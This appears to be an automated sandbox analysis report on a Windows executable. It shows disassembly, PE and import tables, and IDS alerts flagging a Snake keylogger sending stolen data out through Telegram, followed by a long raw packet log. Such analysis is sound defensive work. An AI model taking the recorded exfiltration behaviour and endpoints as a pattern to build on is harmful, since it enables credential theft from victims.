                                                                                                                  cmp eax, ebx
                                                                                                                  je 00007F0D28D65649h
                                                                                                                  push 00000C00h
                                                                                                                  call eax
                                                                                                                  mov esi, 004082B0h
                                                                                                                  push esi
                                                                                                                  call 00007F0D28D68897h
                                                                                                                  push esi
                                                                                                                  call dword ptr [00408150h]
                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                  cmp byte ptr [esi], 00000000h
                                                                                                                  jne 00007F0D28D6562Ch
                                                                                                                  push 0000000Ah
                                                                                                                  call 00007F0D28D688F0h
                                                                                                                  push 00000008h
                                                                                                                  call 00007F0D28D688E9h
                                                                                                                  push 00000006h
                                                                                                                  mov dword ptr [0042A244h], eax
                                                                                                                  call 00007F0D28D688DDh
                                                                                                                  cmp eax, ebx
                                                                                                                  je 00007F0D28D65651h
                                                                                                                  push 0000001Eh
                                                                                                                  call eax
                                                                                                                  test eax, eax
                                                                                                                  je 00007F0D28D65649h
                                                                                                                  or byte ptr [0042A24Fh], 00000040h
                                                                                                                  push ebp
                                                                                                                  call dword ptr [00408044h]
                                                                                                                  push ebx
                                                                                                                  call dword ptr [004082A0h]
                                                                                                                  mov dword ptr [0042A318h], eax
                                                                                                                  push ebx
                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                  push 000002B4h
                                                                                                                  push eax
                                                                                                                  push ebx
                                                                                                                  push 004216E8h
                                                                                                                  call dword ptr [00408188h]
                                                                                                                  push 0040A384h
                                                                                                                  Programming Language:
                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x550000x21068.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x64090x6600bfe2b726d49cbd922b87bad5eea65e61False0.6540287990196079data6.416186322230332IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x80000x13960x1400d45dcba8ca646543f7e339e20089687eFalse0.45234375data5.154907432640367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xa0000x203580x6008575fc5e872ca789611c386779287649False0.5026041666666666data4.004402321344153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .ndata0x2b0000x2a0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x550000x210680x2120003ed2ed76ba15352dac9e48819696134False0.8714696344339623data7.556190648348207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_BITMAP0x554c00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                  RT_ICON0x558280xc2a3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9966684729162903
                                                                                                                  RT_ICON0x61ad00x86e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.990210843373494
                                                                                                                  RT_ICON0x6a1b00x5085PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9867559307233299
                                                                                                                  RT_ICON0x6f2380x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4358921161825726
                                                                                                                  RT_ICON0x717e00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4896810506566604
                                                                                                                  RT_ICON0x728880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5367803837953091
                                                                                                                  RT_ICON0x737300x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6913357400722022
                                                                                                                  RT_ICON0x73fd80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.38597560975609757
                                                                                                                  RT_ICON0x746400x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4934971098265896
                                                                                                                  RT_ICON0x74ba80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.651595744680851
                                                                                                                  RT_ICON0x750100x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.46908602150537637
                                                                                                                  RT_ICON0x752f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5472972972972973
                                                                                                                  RT_DIALOG0x754200x120dataEnglishUnited States0.53125
                                                                                                                  RT_DIALOG0x755400x118dataEnglishUnited States0.5678571428571428
                                                                                                                  RT_DIALOG0x756580x120dataEnglishUnited States0.5104166666666666
                                                                                                                  RT_DIALOG0x757780xf8dataEnglishUnited States0.6330645161290323
                                                                                                                  RT_DIALOG0x758700xa0dataEnglishUnited States0.6125
                                                                                                                  RT_DIALOG0x759100x60dataEnglishUnited States0.7291666666666666
                                                                                                                  RT_GROUP_ICON0x759700xaedataEnglishUnited States0.6091954022988506
                                                                                                                  RT_VERSION0x75a200x308dataEnglishUnited States0.47036082474226804
                                                                                                                  RT_MANIFEST0x75d280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                  USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-10T22:40:10.368402+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649984142.250.185.78443TCP
                                                                                                                  2025-01-10T22:40:21.452271+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649987132.226.247.7380TCP
                                                                                                                  2025-01-10T22:40:29.437077+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649987132.226.247.7380TCP
                                                                                                                  2025-01-10T22:40:30.099611+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649989149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:30.359018+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649989149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:31.358603+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649990132.226.247.7380TCP
                                                                                                                  2025-01-10T22:40:31.946248+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649991149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:32.242467+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649991149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:33.014815+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649992132.226.247.7380TCP
                                                                                                                  2025-01-10T22:40:33.604776+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649993149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:33.909239+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649993149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:35.639978+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649994132.226.247.7380TCP
                                                                                                                  2025-01-10T22:40:36.204461+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649995149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:36.421921+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649995149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:38.712435+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.649997149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:39.076465+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.649997149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:41.188866+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650000149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:41.661508+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650000149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:48.901304+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650003149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:49.269816+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650003149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:57.772086+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650006149.154.167.220443TCP
                                                                                                                  2025-01-10T22:40:58.055062+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650006149.154.167.220443TCP
                                                                                                                  2025-01-10T22:41:04.896089+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.650008149.154.167.220443TCP
                                                                                                                  2025-01-10T22:41:05.200346+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.650008149.154.167.220443TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 22:40:09.310283899 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:09.310373068 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:09.310487986 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:09.322022915 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:09.322061062 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:09.987219095 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:09.987462044 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:09.987972975 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:09.988032103 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.048353910 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.048446894 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.048953056 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.049031973 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.052791119 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.095339060 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.368393898 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.368558884 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.368632078 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.368707895 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.369775057 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.369817972 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.369856119 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.369856119 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.376374006 CET49984443192.168.2.6142.250.185.78
                                                                                                                  Jan 10, 2025 22:40:10.376406908 CET44349984142.250.185.78192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.414238930 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:10.414283991 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:10.414607048 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:10.415175915 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:10.415194988 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:11.069941044 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:11.070022106 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:11.074023008 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:11.074032068 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:11.074359894 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:11.074414968 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:11.074779987 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:11.115338087 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.567105055 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.567200899 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.573184013 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.573262930 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.585669994 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.585743904 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.585760117 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.585802078 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.591651917 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.591703892 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.654623032 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.654683113 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.654714108 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.654742002 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.654758930 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.654781103 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.656418085 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.656483889 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.656506062 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.656553030 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.662775040 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.662949085 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.662957907 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.663008928 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.669104099 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.669161081 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.669169903 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.669217110 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.675347090 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.675419092 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.675430059 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.675477982 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.681787014 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.681860924 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.681869984 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.681925058 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.687850952 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.687908888 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.687948942 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.687997103 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.694236994 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.694307089 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.694314957 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.694371939 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.700054884 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.700124025 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.700130939 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.700184107 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.705810070 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.705873013 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.705881119 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.705930948 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.711608887 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.711693048 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.711699963 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.711752892 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.717427015 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.717502117 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.721995115 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.722183943 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.723237991 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.723299980 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.742208004 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.742269039 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.742290020 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.742296934 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.742333889 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.742397070 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.742400885 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.742443085 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.742526054 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.742592096 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.742685080 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.742733955 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.743969917 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.744020939 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.748534918 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.748588085 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.748593092 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.748598099 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.748629093 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.748663902 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.753916979 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.754017115 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.754024029 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.754064083 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.759524107 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.759593964 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.759599924 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.759654999 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.764318943 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.764445066 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.764451027 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.764527082 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.769426107 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.769495010 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.769503117 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.769556046 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.774040937 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.774107933 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.774113894 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.774168968 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.778675079 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.778731108 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.778736115 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.778775930 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.783337116 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.783416033 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.783423901 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.783477068 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.788009882 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.788244963 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.788253069 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.788302898 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.792659044 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.792733908 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.792742014 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.792782068 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.797296047 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.797353983 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.797362089 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.797477961 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.801681995 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.801747084 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.801753998 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.801800966 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.805859089 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.805927038 CET49985443192.168.2.6142.250.185.129
                                                                                                                  Jan 10, 2025 22:40:13.805932045 CET44349985142.250.185.129192.168.2.6
                                                                                                                  Jan 10, 2025 22:40:13.805985928 CET49985443192.168.2.6142.250.185.129
